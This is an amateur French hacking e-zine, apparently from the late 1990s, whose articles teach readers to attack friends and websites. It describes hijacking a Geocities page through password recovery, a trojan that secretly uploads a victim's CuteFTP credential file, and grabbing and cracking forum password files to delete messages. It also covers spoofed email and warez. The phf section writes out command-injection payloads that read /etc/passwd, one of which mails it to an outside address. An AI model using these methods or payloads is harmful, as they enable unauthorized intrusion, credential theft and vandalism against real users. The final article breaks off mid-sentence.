Copy Link
Add to Bookmark
Report

BlasT Issue 1

eZine's profile picture
Published in 
Blast
 · 11 Oct 2020

  

<---------------------------------plein ecran: 800 pixels de large------------------------------>

<!{BlasT}!>

/[{(/****||****\)}]\
* -=Blast Nation=- *
\[{(\****||****/
)}]/
presents
~~~~~~~~~~~~~~~~~~
»BlasT«
~~~~~~~~~~~~~~~~~~
release #1



-={ Edito: }=-

Salut les cakes! Et voilà le premier number 1 first numero de BlasT, c'est beau
un premier numero :). Ici y'a no censure, c'est de l'autocensure...
bite couille chatte koi(grossier personnage!)..... Bon de koi kon parles dans cet
e-mag(encore un!!!!!)? Ouais encore un, on est désolé mais moi fo ke je trouve un
truc pour m'okupper(et mes potes aussi)..... Donc on parle principalement de hacking,
et autres trucs undergrounds... On essaieras dans la mesure du possible de ne pas trop
inclure de trucs unix pour ceux ki ont pas de systeme unix, linux ou autres...
Les participations au mag sont les bienvenues, ainsi ke des idées d'articles
(j'preferes kan meme les participations) A part ca tout le groupe BlasT Nation
(on est qque 3 hihi ;) espere ke vous ferez un bon usage de ce mag et ke surtout
vous fouterez pas trop le bordel sur le net ;). Bon euh j'crois k'il faut faire un
disclaimer pour pas changer et pas avoir d'emmerdes (koi ke..)

DISCLAIMER: LISEZ MAIS NE METTEZ PAS EN OEUVRE CE QUI
SUIT.... C'est pour les gens qui font des etudes et qui ont besoin de
s'instruire dans la culture informatique qu'on a fait ca, et pour aucune
autre raison.

K'esk'on se marre...... ;))))

#BlasT Nation#

Pour vos contributions: envoyez vos articles, astuces ou autres trucs sympa
a: blastnation@hotmail.com
vous génez pas on aime bien les contribs :)))) ca nous evites de bosser :)

-------------------------==×××:~#

-={ sommaire }=- -={ author }=-

0. C koi ts ces mots k'ils racontent ces gens là????????? bOmb_z
1. HaCkInG(?) GeOcItIeS??? kl@imer
2. Warez kl@imer/bOmb_z
3. How To Hack Your Friends :) kl@imer
4. Forums(WWWboard) easy hacking kl@imer
5. Phf, worldwide old hacking method kl@imer
6. Qu'est-ce qu'un Lamer? kl@imer
7. BIOS passwords cracking ? Fastoche !! patriX
8. Fake e-mail ; with style ! patriX
9. Dis , papa , comment on fait les virus ? (cours 1/?) patriX
10. Pcmag et ses images hard (petit cochon!) patriX
11. Cracker des programmes? Mais komment k'ils font? kl@imer
12. Planquer ses fichiers kl@imer

-------------------------==×××:~#


0. -> C koi ts ces mots k'ils racontent ces gens là?????????

Explications:
--
# hacker: (ben oui je sais, ça parait un peu con de definir ça, mais il y a des ultra-novices ;)

Un hacker est un pirate informatik dont le but est de s'introduire clandestinement
ds d'autres becannes ds plusieurs buts: trouver des infos cachées par les méchants
gouvernements au gentils citoyens ;), gagner des boursoufs ou tt simplement se la jouer ;)
--
# cracker: (là, c + dur: c pas ds le dico ;)

Cette personne est prise d'une autre passion ke le hacker (mm si les deux moves se
rejoignent a fond et k'ils sont complementaires!). Cette passion, c donc de trouver des
passwords et de les decripter!
Il y'a d'autres types de crackers: ceux ki desassemblent un programme a l'aide d'un debuggeur
et ki tracent le programme afin de trouver un mot de passe ou bien trafiquer le programme pour
ne plus avoir affaire aux limitations de leurs sharewares, ou autres..
--
# phone-phreaker: (putain, c koi ts ces mots... :)

Ca, c des mecs ki ont une dent contre les sociétées de telecom (ben vi, y'a pas ke
FT ki fait chier le monde ;) et ki ne veulent pas les enrichirent encore + :))). Ils bricolent
donc des fausses cartes telephonikes, des progs pour bloker la tonalite du phone--> ne rien
payer ;) etc...

# underground: Robert & Colin (1991): clandestin, secret...

Ben vi, l'underground est un move secret auquel se disent appartenir les hackers,
crackers, phone-phreakers et autres cyberpunks ;). C un move de marginaux de la sociétée
(au départ!!!) qui se rebellent

# virus: euh... nan... faut pas déconner kand même!!!!

Pour la petite histoire: le 1er big group des hackers (ceux ki ont lancés le move!) c le Chaos
Computer Club of Hambourg (ben oui, c en Allemagne!!!!) qui est né à la fin des années 80 et
ki hacka des ord (ndklaimer: putain tu pourrais terminer, merde!)

°-_-° bOmb_z °-_-° (ndklaimer: C koi ce nom????!!!! ;)



-------------------------==×××:~#



1. -> HaCkInG(?) GeOcItIeS???

Voilà l'autre fois j'etais tranquilement sur le net en train de
chercher un moyen simple de hacker la page d'un pote (qui m'avait
serieux fais chier d'ailleurs). Alors voilà, je me dis okay il est
sur geocities... imaginons ke je sois lui l'espace d'un instant et
que j'ai perdu mon pass pour ma page. Komment ke je pourrais
faire ;)? Bon parton de ma premiere idée... Demander de renvoyer
le mot de passe sur son mail et l'intercepter avant lui... Nan, je
vais pas me faire chier a faire ca c'est encore plus galere que de
trouver son pass geocities... Alors bon là j'ai une idée a la con
qui me viens a l'esprit: imaginons (encore une fois) ke je sois lui
(encore!) que j'ai perdu mon pass, et bien evidemment n'ayant pas
mon pass je ne puisses plus recevoir mon mail.. doit bien y'avoir
une solution non?????? Je parcours toutes les faqs a la recherche
d'indices et d'un seul coup me viens cette sublime URL:
http://www.geocities.com/help/pass_form.html. alors là a partir
du moment que vous connaissez un tant sois peu la personne que
vous hackez, et que cette personne sois assez conne pour laisser
des vrai renseignements sur elle dans son inscription... On peut
dire que sa page est déjà hackée! :)(je vais pas detailler la page
est assez explicite, suffit ke vous compreniez l'english). The Only
problem( eh oui y'en a sinon ce serait trop simple ;) ): T'es obligé
d'attendre 2-3 jours(en fait ca depends de ta precision dans les reponses)
avant de recevoir le pass...

kl@imer



-------------------------==×××:~#



2. -> Warez

Bon, ce texte est déstiné at tha' Lamerz only ;). Ahhh Le warez :)
hehe! Moi je vous avourais a l'occasion que je commences a en
avoir plein la gueule de toujours trouver les meme progs dans tous
ces sites... D'ailleurs les progs j'en ai a ne plus où savoir
où y donner de la tete... JE vas quand meme vous expliquer comment
en trouver histoire que vous ne mourriez pas con dans le channel
#warez-france (pkoi s'abaisser si bas???).

Premierement: Se reserver une apres midi de libre enfermé avec
son pc
Deuxiemement: Avoir des reserves de bouffes a coté de soi
tercioo: s'armer de son clavier
quatriooooo: on y goooo!!!

Une des methodes les plus cons et aussi une des meilleures est
de passer par ftpsearch ( http://ftpsearch.ntnu.no/ftpsearch )
TU rentres le noms du prog, et tu trouve tout simplement... enfin
y'a quand meme des formalités:
Configurer Ftpsearch pour qu'il donne ses resultats par ordre de
dates
Avoir un bon mot clé... (APPZ, WAREZ, GAMEZ :)) ............)
si vous recherchez kk chose de precis: rentrez le nom du prog
et specifiez le path en bas a droite(me souviens plus le nom
de l'option) genre "APPZ" si vous recherchez photoshop(par exemple)
.... les resultats sont pas forcements bon du premiers coup mais
on finit par y arriver par tattonnement (souvenez vous: un APRES
MIDI de LIBRE ;) ). Y'a aussi filez (http://www.filez.com)
qui marche mais qui donne de moins bons resultats.
Bon ensuite meme si vous trouvez des sites (et vous en trouverez!)
La plupart ne marcherons pas ( ca c'est con ca...) Donc deja pour
faire une selection a la va vite vous testez les liens les plus
recents toujours avec ftpsearch.. si ca marches, c'est okay, sinon,
essayes un autre (il vaut mieux essayer de telecharger pour voir si
le site ftp est bien en marche). Apres des ke tu trouve ton progs
bah là je te conseilles de prendre un client ftp ca eviteras que tu
sois comme un con si le site a un petit maximum de clients et qu'un
gars se connectes a ta place pendant que tu reflechis ;)
Apres, bonne chance pour le telechargement(et laisse tomber les
sites qui depassent pas 2ko a la seconde).. ;)

A ce propos si y'en a qui veulent faire des echanges
> blastnation@hotmail.com

kl@imer

2(bis). Warez with FTP

Mon cher collègue, et néanmoins ami, kl@imer vs a donné
qques methodes pour trouver du warez! Moi, je vais vous en
divulguer d'autres:

1: Aller sur IRC: #warez-france et attendre ke qq1 donne l'IP
de son FTP avec son l/p ( c généralement un truc du genre:
195.132.62.1 L: warez P: zeraw ...). Après, vs vs y connectez
avec votre client FTP et vs recuperez ce ke vs voulez

2: Qq1 annonce k'il ouvre un compte sur son server à ki lui
trouve tel ou tel truc! Là, une lumière s'allume ds votre (petit?)
cerveau et vs vs dites: merde, mais je l'ai (ou je l'ai déjà vu sur
un site) ce truc! Vs vs empressez de

ATTENTION: certains sites pratiquent une politique d'échange:
pour enrichir le server, pour récuperer un prog, vs devez en
uploader d'autres! Généralement, le "ratio est de 3 octet downloadé
contre 1 octets uploadés !!!

Une autre methode, + facile et -longue: se rendre sur le channel: #0day
(c un zero, pas un o majuscule!!!). Là, il faut attendre la venue de
"
copyright". Vs lui faites un DCC et ensuite, vs vs démerdez pour optenir
la 0day (taper 2 je crois,

si vs avez des questions: blastnation@hotmail.com ou bombz@hotmail.com

°-_-° bOmb_z °-_-°

2(rebis???). TIP

Etant donnés ke nous ne sommes pas tous des "
cybercablés" comme notre amis
bOmb_z, I've a little tip (ke j'ai repiquée au mag row 2, qui eux meme l'ont
repiqués a un certain yannou, qui peut-etre lui meme l'a repiké a kelk'un d'autre
mais ca j'en sais rien, thx! ;). C'est le principe du direct transfer: vous avez trouvés
un super warez, mais là vous avez pas le temps de le telecharger, vous etes en
horaire rouge ;) ou alors vous avez kk chose d'autre a faire d'urgent.... Seulement
voilà: est-ce ke le programme convoités sera encore là kan je reviendrais??!!
Ca c'est toujours un probleme des plus agacants... la solution s'appelle:
SuperFTP... vous pouvez le trouver via ftpsearch sans trop de problemes...
le but du jeu est de transferer le contenu d'un site rapide, dans un autre site
rapide (on va dire deux T1)... donc vous trouvez votre site warez, si possible
un rapide(une T1 dans la mesure du possible..), vous l'ouvrez dans la fenetre
de droite de super ftp, avec le login et pass adequate(ou anonymous suivant le site)
dans la fenetre de gauche, deux solutions s'offrent a vous: vous ouvrez un second site
ftp public avec un repertoire incoming ou vous pourrez downloader des fichiers
(vous aurez pris soins d'y faire un dossier caché auparavant) ou alors, vous
ouvrez un compte de page web gratos, par exemple a www.chez.com
qui vous offrent 10 mos... donc 10 mos de warez ;) et là vous vous
y downloadez les programmes warez dont vous avez besoin....
Donc, une fois connectés aux deux site, vous faites un drag&drop
du fichier convoité de la fenetre de droite vers le fenetre de gauche
et normalement en bas a droite devrais y avoir ecris: direct transfert
Et bah voilàà!! C bon!!! Une fois finit ( j'ai deja mis 6 minutes
pour un fichier de 7 mo). Bah vous pouvez vous deconnecter et vous pourrez
retrouver votre fichier en lieu sur kan vous aurez besoin de le downloader...
;). Autre avantage de la chose: pour les sites a ratio, vous pouvez
vous en servir pour uploader des fichiers a vitesse grand V,
c kan meme bien pratique ;)


kl@imer
blastnation@hotmail.com



-------------------------==×××:~#



3. -> How To Hack Your Friends :)

Aujourd'hui j'ai envie de faire chier un de mes potes (encore!).
J'ai tout essayé pour recuperer son mot de passe mais rien a faire,
impossible... (je me couche et dans mon lit je penses...) EuReKa!
Ce debile de pote a cuteFTp... hehe, les programmes ftp ils ont
un fichier qui contient les mots de passe, les logins, et les adresses
des sites ftp :)).. Esperons que ce debile a pensé a enregistrer ses
mots de passe! (paske sinan c foutu). 2ms plus tard: "
Ah ouais mais
ca va etre chaud si il a pas installé cuteFTP dans la directory par
defaut...." . Le lendemain matin: HOp Où k'il est le fichier convoité
de cuteftp?? je cherches dans la directory et 5s plus tards, hop
je trouve tree.dat :) Alors faudrais ke je passes chez lui et ke je
lui pikes ce fichier pendant k'il regardes pas?!! Ouais ce serais pas
mal sauf ke lui il veux pas ke je vienne chez lui(ou alors il habite
aux USA, c selon vous ;)... Komment ke j'fais? reEUreka! Je suis
makiavellike! je vais lui envoyer un prog qui vas m'envoyer son fichier
sur mon mail ou mon ftp (celui de ma page web) sans ke lui s'en rende
compte, alors k'il crois faire autre chose! Ni une ni deux, je reprends
le vieux programme ke j'avais fait(si possible demerdez vous pour ke ce
soit un programme censé marcher online sinan ca fait louche un prog
offline qui ne marche que online). J'ajoute au debut du programme
un truc qui va deposer son fichier c:\program files\cuteFTP\tree.dat
sur le serveur ftp de ma page web sans k'il ne vois rien (en fait faut
mettre un truc du genre: "
loading pleaze wait..." pendant ke ca
uploade)! une fois finit le programme debutte vraiment et lui y
vois ke du feu... Bon bref une fois ke c fait, vous vous n'avez plus
qu'a prendre le fichier tree.dat dans votre ftp et le foutre dans votre
directory de cuteFTP.. bon bien sur vous n'avez pas son mot de passe
(il est codé), mais vous pouvez aller librement sur SON serveur ftp :)
Bien entendu il est posible de faire ca avec d'autres fichiers...
a propos si y'en a k'a le nom du fichier ki contient les mots de passes
et identification pour se connecter (et aussi pour netscape mail ou
internet mail) a internet sous win95, pleaze dites le moi(meme si ils
sont codés je m'en tapes du moment ke je puisse les reutiliser :)!

kl@imer
blastnation@hotmail.com



-------------------------==×××:~#



4. -> Forums(WWWboard) easy hacking

Comment emmerder son monde avec les scripts cgi de forums de
discussions? Ma petite recette: tout d'abord examiner les lieux...
Regarder quel est le nom du script cgi: ca peut tres bien etre
wwwboard.cgi, ou wwwboard.pl dans la majorité des cas, mais il arrive
assez souvent que ces petits scripts soit renommés.. pour connaitre
leur nom, rien de plus simple, vous pouvez par exemple regarder les
propriétés du lien qui menent vers cette page(tout ceci depends de la
volonté de celui qui a fait le forum). bon bref une fois que vous avez
ca, faudrais penser a chercher le script cgi d'administration..
normalement il s'appelle wwwadmin.cgi (ou wwwadmin.pl c'est selon).
bref l'autre fois j'etais tombé sur un info-chat.pl et info-admin.pl
comme koi faut chercher des fois :)(inutile de preciser que ces scripts
sont normalement dans la directory cgi-scripts ou cgi-bin du serveur).
Une fois ke vous avez ca, faut chercher le fichier mot de passe du
forum ... c'est pas tres dur, t'as 95% de chance qu'il s'apelle
passwd.txt (les 5% qui restent c'est pour ceux qui ont pensés a modifier
la source de leur script).... Ce fichier se trouve normalement dans la meme
directory que la page html qui contient le forum... En gros dans l'url vous
avez juste a changer le nom de cette page et la remplacer par passwd.txt
... Et là ca y'est vous avez le fichier password du forum, maintenant
faut le decoder... :)) Armez vous de votre cracker jack ou autre decodeur
passwd unix favoris ainsi que d'un bon fichier dico et lancez le sur ce
fichier (a propos faudras faire ressembler votre fichier a ca:
login:password:281:15:toto dupond:/usr/email/users/toto:/bin/csh )
Ensuite vous trouvez le pass et hop un tour dans le script d'admin
et vous effacez tout les messages :)))

kl@imer



-------------------------==×××:~#



5. -> Phf, worldwide old hacking method

Bon je vous parles de ca histoire de vous en parler paske si vous
trouvez un endroit ou ca marche, mail me(koi k'il parait ke la
nasa... faites gaffes y'en a deja un ki s'est fait choper).
Bon bref, c'est pas tres compliqué, phf est un script cgi censé
servir a l'administrateur du systeme a recuperer des informations
a distances sur une station unix... Le principe est simple, recuperer
le fichier passwd du repertoire /etc/ avec ce script....
La methode la plus simple serait de faire:
http://www.xxxxxxx.xxx/cgi-bin/phf?qname=%0a/bin/cat%20/etc/passwd
malheuresement ca ne marches vraiment, mais vraiment que tres peu
souvent, car tout le monde est au courant, et tout le monde
s'est premuni contre... ceci dit, y'a surment encore des endroits ou ca
marche, faut chercher.... En plus il est possible que l'admin ai changé
le nom du script... Enfin bref, celui ki a trouvé ca, il aurait pu faire
fortune si il avait revendu des droits d'auteurs, mais aujourd'hui....
Faut laisser tomber cette methode.. j'penses ke ca vous feras gagner du
temps.... Ou alors si vous avez une moule d'enfer, vous pouvez toujours
tester.... Y'a aussi d'autres trucs en vracs avec les cgi:
http://www.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd
<INPUT TYPE="
HIDDEN" NAME="mailto_address"
VALUE="
truc@truc.fr;mail you@lamerz.com < /etc/passwd">
etc.... dites vous seulement k'il faut trouver un serveur mal
configuré.. en fait on apelle tout ca des "
exploits" mais en general
les vrais exploits sont des progs lancés sous une machine unix, linux,
windaube NT ou autre ki sont censés vous donner le status de root
(donc vous pouvez tout faire sur la machine!) seulement le probleme
c k'on a pas toujours un compte sur la machine k'on veux hacker
(ce serait trop beau). C'est pour ca que meme si vous ne trouvez
pas le mot de passe root, mais celui d'un utilisateur kelkonkes,
ca vous simplifie rudement la chose pour l'avoir

kl@imer



-------------------------==×××:~#



6. -> Qu'est-ce qu'un Lamer?

Le Lamer par excellence c'est celui qui espere avoir une reponse a cette kestion...
(article fait a la va vite histoire de me marrer un peu ;)



-------------------------==×××:~#



7. -> BIOS passwords cracking ? Fastoche !!

Bon , maintenant que j'ai le droit de parler , je vais vous parler un peu du
cracking de passwords de BIOS ; vous avez l'impression de vous heurter
à une forteresse impénétrable quand vous êtes confronté(e?) à un mot de
passe au boot ? Et ben , vous avez pas beaucoup fouillé le net ... la méthode
que je vais décrire plus bas est vieille comme l'ENIAC ! Il y a différentes
méthodes , mais je vais commencer par celle qui me plaît le plus :
la méthode hardware (d'accord , un peu plus bourrin) . Les informations du BIOS
( disques durs , ports , lecteurs ...) y compris le mot de passe donc sont stockés dans
la mémoire CMOS, une mémoire à l'image de la RAM .
Mais alors , me direz vous , si on éteint l'ordinateur , tout s'en va , puisque
c'est de la mémoire vive !!! Et bien , ces informations sont maintenues dans
la CMOS par une petite pile (regardez sur votre carte mère ,si ,si !)
Une petite pile qui se recharge à chaque fois qu'on allume l'ordinateur et
c'est comme ça que le mot de passe est maintenu ; maintenant , vous l'avez
bien sûr compris , si on coupe le courant que délivre la pile , la CMOS perd
tout , y compris le password ! Donc , tout ce qu'il faut faire , c'est retirer la
pile , la remettre et allumer l'ordinateur , c pas compliqueu , nan ? Ah ,
j'oubliais , il y a un petit détail assez génant ... sur certaines machines ,
la pile est soudée à la carte mère (argghh !) mais ne t'inquietes pas petit niaqué !
Il y a une autre solution , plutôt que de te ramener avec ton fer à souder et ta
pompe à désouder . Dans tous les cas , il y a un jumper (ou cavalier pour Toubon)
quelque part sur la carte mère (wow ! quelle information ! quelque part sur
la carte mère ! merci , maintenant je sais c où !) qui une fois retiré videra la
CMOS de son contenu . Si vous avez la doc de la carte mère (hmm...) , ce sera sans
probleme sinon vous pouvez toujours essayer de regarder un peu
les informations sur la carte : les jumpers sont toujours (enfin presque)
étiquettés ; mais pauvre de vous , vous n'avez pas de chance et vous ne tombez
dans aucun de ces cas , alors il ne vous reste plus qu'à deviner le jumper !!
Le jumper est souvent à côté de la pile ; maintenant , si vous n'avez pas beaucoup
de connaîssances en hard , ne vous inquiétez pas !!! Le soft vient à la rescousse !
Vous avez sûrement dû voir sur tous les sites de hack , des programmes de crack
de password BIOS . Mais attention !! Ces programmes diffèrent selon le BIOS !
Le programme pour un AMI bios ne sera pas le même pour un AWARD ; bon
j'explique le principe de ces programmes rapidement et je conclus paskeu
ca commence à faire long !! Pour accéder au password , ces programmes doivent
connaître l'adresse mémoire ainsi que le format du mot de passe ; des qu'ils ont
ces informations , tout ce qu'ils font c'est vous renvoyer le mot de passe dans
plusieurs formats possibles (ça dépend du bios) : codes ASCII , plain text , etc ...
apres faut (c'est selon le format) décoder mais certains crackers le font automatiquement .
Enfin , pour conclure je vous donnerais un petit conseil : choisissez plutôt la
premiere méthode ; si vous avez pas le temps , ou si vous vous connaîssez pas
l'architecture de votre pc , c pas la peine de risquer sa vie ... mais faut apprendre ,
apres tout , j'ai bien ouvert le minitel de mes parents à 9 ans (d'ailleurs je me suis bien
fait engueuler ce jour là ...)

°patriX°



-------------------------==×××:~#



8. -> Fake e-mail ; with style !

Bah , vous me direz ce truc tout le monde sait le faire , mais komm je suis à
cours d'idées pour l'instant , ben , je vais vite vous expliquer comment ça marche :
alors , tout d'abord , l'intérêt que je n'ai pas compris pendant longtemps , d'envoyer
de faux mails , c'est que si vous voulez pour une quelconque raison envoyer des
mails sans qu'on puisse en savoir la provenance , et bien cette méthode est la seule !
En gros , il faut se connecter par telnet à un serveur STMP quelconque par le
port 25 ; pour l'instant , ca va ... apres des que vous êtes connecté à ce serveur , tapez

HELO name.domain (ou tout autre chose , ca n'a pas d'importance )
MAIL FROM:tamere@tonpere.com (pour les polio , c po la peine de mettre le même
e-mail )
RCPT TO:mongolien@lamer.fr (destination)
DATA (ensuite , il faut taper le coprs du message)
(pour mettre fin au messge , tapez un '.' tout seul sur une ligne)
QUIT

Voilà , vous avez envoyé un faux mail ; mais attention , quand vous taperez , rien
n'apparaîtra à l'ecran , c normal ; c pkoi , il faut pas faire de fôte (pour une fois en
informatique)
Dernier avertissement : sur les systemes qui possèdent le RFC 931 ,vous ne pouvez
pas spoofer votre IP , alors dans ce cas , vous me direz , où est l'intérêt ??? Ben y'en
a pas , il fo tout simplement pas se connecter à ces serveurs ...
Ah ! J'oubliais : (héhé) il m'est arrivé de me heurter à des machines bêtes comme mes
pieds , qui volontairement par les possésseurs , n'envoient des mails qu'en local : c'est
à dire si vous essayez d'envoyer un mail à polio@triso.con et que vous êtes sur une
machine d'IP mail.caca.boudain , il faudra que l'adresse soit polio@caca.boudain;
M'enfin vous verrez bien avec la pratique ...

°patriX°



-------------------------==×××:~#



9. -> Dis , papa , comment on fait les virus ? (cours 1/?)

Voilà , je me balladais tranquillement sur le net quand je tombe sur un site qui soit disant
expliquait le fonctionnement d'un virus ; apres la lecture de l'article j'étais plié en deux de
rire ... on se fout vraiment de la gueule des gens !! C'est là que je me suis dit , tiens , et si
je donnais des cours de création de virus pour les lecteurs-blaireaux de BlasT ( en plus je
savais plus quoi écrire et j'allais me faire engueuler , alors , cette idée , elle tombait à pic)
Bon , tout d'abord , on va s'expliquer sur ces cours : je suis pas ta maîtresse d'école , ne
m'écris pas pour me demander des trucs carément débiles que g explicité dans le mag ;
ensuite , je sais pas combien de numéros ça va prendre pour achever tous les cours ,
alors me faites pas chier les autresrédacteurs ...
Bon , voilà pour les règlements de comptes ... on commence !!
Pour ce premier cours , on va y aller mollo , pas de code source , pas de programme
pré-compilé , y 'a pas à réfléchir donc ; on va d'abord expliquer comment fonctionne
un VIRUS;
On va commencer par les programmes les plus courants , qu'on trouve un peu partout:
les TROJAN HORSE (ou cheval de Troie) , les WORMS (ver de terre , insiste M. Toubon) ;
les trojan horse sont des virus qui se "
déguisent" pour attaquer le systeme .
C'est à dire qu'on introduit un virus dans un autre corps
Par exemple , je met mon virus trucmuche dans un programme de simulation de vol ;
Le type va lancer le jeu comme un con , et puis pendant ce temps mon virus trucmuche
va infecter l'ordinateur ...
Les WORMS , eux sont encore plus bêtes ... et simples à réaliser ,
c'est pour ça qu'on va commencer par en faire !!(mais pas tout de suite) Bon , les worms
eux , ils sont autoreproducteurs ; c'est à dire qu'ils se copient eux-mêmes , alors
que les virus tout cons passent par des executables pour se reproduire ...
Leur intérêt ? Ils ralentissent la machine ou la detruisent carement (plus rare) et se
transmettent à d'autres machines par le biais de réseaux et d'echange de disquettes.
Les BOMBES LOGIQUES sont des virus qui ont des tâches diverses à accomplir
à une date précise ; une bombe logique connue : Friday the 13th qui s'éxecute tous
les vendredi 13 ;
Les virus de seconde génération ont un fonctionnement plus complexe qu'on verra ,
lorsqu'on apprendra à en faire , parce qu'il faut déjà bien connaître les premiers virus
pour comprendre ceux-là .
Maintenant , on va voir ce que font les virus en général :
Tout d'abord , la cible préférée des virus , les fichiers executables . Le virus infecte
les .COM ou les .EXE et des que ce fichier est executé , lui aussi en infecte d'autres et
ainsi de suite ... (jusqu'à ce que ce rabajoie d'anti-virus se ramène . Pfff , connard !)
Ensuite , autre victime priviligiée , les secteurs boot ; dans ce cas le virus va squater
les secteurs boot de la disquette , ou du disque dur ( MBR = master boot record ) ; si
c'est sur une disquette , il suffit d'accéder à la disquette et c fini , travail terminé . Si c
le disque dur , impossible de booter , et puis c tout ; il y a un moyen quand même , c
de booter sur une bonne disquette avec un anti-virus ... sauf si ce malin de virus
est un petit innovateur qui ne se fera pas reconnaître de l'anti-machin !! Mais les plus
salauds sont sûrement ceux qui enculent (oh!) les clusters ; ils s'amusent à réécrire
une partie des fichiers systemes pour que ceux-là pointent sur eux .
Un petit renseignement que je vous donne : il y a des nouveaux virus qui innovent en
la matière : c'est les mail mettant en garde contre des virus qui s'introduisent dans
votre systeme via un mail ; c bien sûr impossible !! Beaucoup de blaireaux ont paniqué
récament en recevant le message intitulé "
PENPAL GREETINGS : avertissement" ; ça ,
ça mérite vraiment d'être qualifié de virus avec la technologie NEUNEU INSIDE .
Voilà , voilà pour ce premier cours de création de virus ; ok , on n'a pas appris à en faire
cette fois-ci , mais il est essentiel que vous connaîssiez le vocabulaire , comme ça , je
trouverai pas de message dans ma mailbox d'un mongolien qui me demande c koi un
cheval de troie ; si vous avez des questions INTELLIGENTES , c bon vous pouvez
m'écrire : einstein@mygale.org .

°patriX° (merci à nexit pour les méthodes pédagogiques dont je m'inspire
paskeu moi je suis pas prof et il faut bien que vous cmpreniez ce que je raconte )



-------------------------==×××:~#



10. -> Pcmag et ses images hard (petit cochon!)

Vous connaîssez Pcmag (pub gratos au passage) ? L'un des journaux d'informatique
le plus lu ( enfin , lu par des blaireaux ...) ; sur les cd de pcmag , on pouvait trouver
des images à carctère douteux (tout le monde il a kompris de koi je veux parler) .
D'abord , on a droit à des images dites "
soft" ; hmmm ... , moi tout ce que je vois
c des vieilles avec des robes jusqu'au genou (putain , je bande!) ensuite
je klique sur "
images hard" ; et là je me trouve face à une interface qui me demande
la clé du fichier comprenant plusieurs images . Sans cette clé , je peux rien voir ... et
pour obtenir la clé , rien de plus simple ... se connecter au 3617 pour qu'on vous vole
75 balles juste pour avoir droit à quelques images cochonnes . Justement , la solution
qui va vous sortir de l'impasse , c'est ... le hacking ! Enfin , le cracking plutôt , mais
bon on va pas faire de différence , les hackers et les crackers , c la même famille (koi ke
les crackers convoitent les titre de hacker alors qu'il ne le méritent pas ...) Bon revenons
à mon histoire . Alors , ces images à cracker , a beaucoup remué les crackers français .
Tout le monde s'est précipité pour acheter ce PQ et essayer de cracker les codes .
On y est vite arrivé ... plusieurs programmes ont été créés pour cracker les codes
à partir du nom du fichier compressé qui contient les images ; mais avant tout ça ,
moi comme un con , qui n'y connaissait rien au cracking à l'époque , j'ai ouvert un de
ces fichiers avec un editeur de texte ; idée absurde penserez-vous ... mais comme
un con et n'écoutant que mon instinct inné de cracker (hmm) , j'ai continué à observer
le "
texte" et je suis tombé sur une ligne de merde par hasard où j'arrivais à lire
quelques lettres et chiffres . Et ben , vous me connaissez maintenant , con comme g t
et ben g essayé cette ligne dans la zone "
Entrez la clé d'activation des images"
c'est à dire là où il faut mettre le code , et ça avait marché , je venais de cracker
les codes !!! Ca avait marché ; vraiment un énorme hasard me direz vous ... mais
pas autant que vous le croyez ... dans tous les fichiers , aux alentours de la ligne 36
en taille 8 (j'utilisais wordpad , la honte ... [ndklaimer: on est tous passés par là ;)])
et ben je trouvais une serie de lettres et de chiffres qui étaient en fait les codes ;
voilà , c t ma première expérience avec le cracking. Et aussi , les premieres images de
boules aussi crados que j'aie vues. Tout ça pour vous montrer que le hacking/cracking , c
pas si dur... même un gogol comme moi à l'époque arrive à cracker . Ok , c bon , je sais
que je vous ai rien appris et que vous avez perdu dix minutes à lire cette merde.
Mais au moins vous connaissez un moyen sûr de voir des images de Q ...

°patriX° (non monsieur , je ne me branle pas devant mon ordinateur ! )

kl@imer tiens a preciser que cette methode, a mon avis, ne doit plus
trop marcher puisque pcmag et pcloisir ont, ils me semble, changés la
methode de codage depuis kelkes mois déjà(en fais bcp de mois), et de +,
je crois k'ils ont encore carréments changés le nombre d'image par fichier
qui est passé de 4 à 6 si j'en crois mes sources(sources (c)bouznik).
DOnc, si vous voulez tester je vous suggere de tester sur des anciens
numeros... Autre chose, comme le disais si bien patriX, plusieurs decodeurs
d'image pcloisir/pcmag existent et selon la version, vous pouvez decoder
jusqu'au numero 98(un truc du genre), et avec le dernier ke je connais,
on peut decoder les suivantes mais avec des fichier qu'il faut mettre a
jour pour chaque nouveau pcmag.... donc c un peu chié... Sinan j'ai testé
ca marche très bien (peu etre trop), et les images sont........ plutot
hot, bien ke j'ayes déjà vu pire contrairement a mon amis patriX
(tiens au fait patriX si tu veux les voir, tu me demandes mais j'te
jure k'c'est dégeux).



-------------------------==×××:~#


11. -> Crackers de programmes? Mais komment k'ils font?

Non, les crackers ne trouvent pas les mots de passe en testant au hazard! Non, les crackers
ne s'amusent pas a tester chaque possibilité avec un progamme jusqu'a tant k'ils en
trouvent une bonne! Non, les crackers n'editent pas leur programmes avec wordpad (patriX ;)!
Non, les crackers ne mattent pas dans le code hexa du prog et ne changent pas des codes
au hazard! Non, il ne suffit pas d'enlever un fichier du programme(bonjour les bugs apres
si par hazard ca marche)! Non, pas la peine non plus d'editer un fichier ini.....
Toutes ses methodes, bien qu'elles ayent pu marcher il y'a longtemps de celà(pour certaines),
ont completement étées laissées tombées par les crackers contemporains. Autant utiliser des
methodes valables qui marchent, et un peu moins bourrins. Alors me direz-vous, c'est koi
LA technique? J'explique: Il existe une catégorie de programmes appelés debuggers. Ces
programmes ont étés a l'origine créés pour les developpeurs, afin de corriger les defaux
des programmes, apres que ceux ci aient étés compilés... Le principe de ces programmes
est simple: resider en mémoire et tracer le programme, en decomposant son code en language
assembleur, language tres proche de la machine mais comprhensible par l'homme... Par
exemple, quand le developpeur trouve un bug dans son programme, il se place par exemple juste
avant ce bug, appelle le debugger, trace le programme et trouve ainsi la cause du probleme,
toujours en assembleur... Il n'a ensuite qu'a le corriger en memoire, et une fois que ca marche,
il lance un editeur hexadecimal et corrige l'octet qui cloche... Donc, j'imagines que dans
votre esprit les choses s'eclaircissent(j'espere;). L'outil de prediction du cracker
est donc sans conteste le debugger. Un des plus connu est softice est il est distribué
un peu partout sur le net, piraté... Il existe en version dos, win 3.1 et win95.
Une fois que le cracker a récupéré ce programme, il ne lui reste plus qu'a pirater le programme
convoité ;). C'est justement ca le plus dur, vous vous en doutez... évidemment, cracker sous
windows 95 est plus dur que sous le dos, mais en fait c'est une question d'habitude.
Le principal probleme avec win95 reside dans le multitache, ca complique la vie...
J'explique: Vous lancez softice win95 resident en memoire, parallèlement à windaube95...
celui ci peut donc etre appelé a partir de windows sur une simple combinaison de touches.
Seulement, si vous lancez votre programme et que vous appelez softice vous avez 1 chance sur
je sais pas combien de milliers de tomber sur l'endroit meme de votre programme. cause:
